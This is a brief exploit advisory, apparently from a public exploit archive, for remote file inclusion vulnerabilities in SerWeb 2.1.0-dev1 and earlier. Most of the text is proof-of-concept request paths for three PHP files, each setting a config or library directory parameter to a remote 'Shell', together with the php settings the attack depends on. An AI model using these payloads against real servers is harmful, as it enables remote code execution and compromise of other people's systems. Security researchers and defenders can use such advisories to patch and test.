SerWeb <= 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/ POC: /load_lang.php?_SERWEB[configdir]=Shell /main_prepend.php?_SERWEB[functionsdir]=Shell /load_phplib.php?_PHPLIB[libdir]=Shell Us = php_flag magic_quotes_gpc Off / php_flag magic_quotes_runtime Off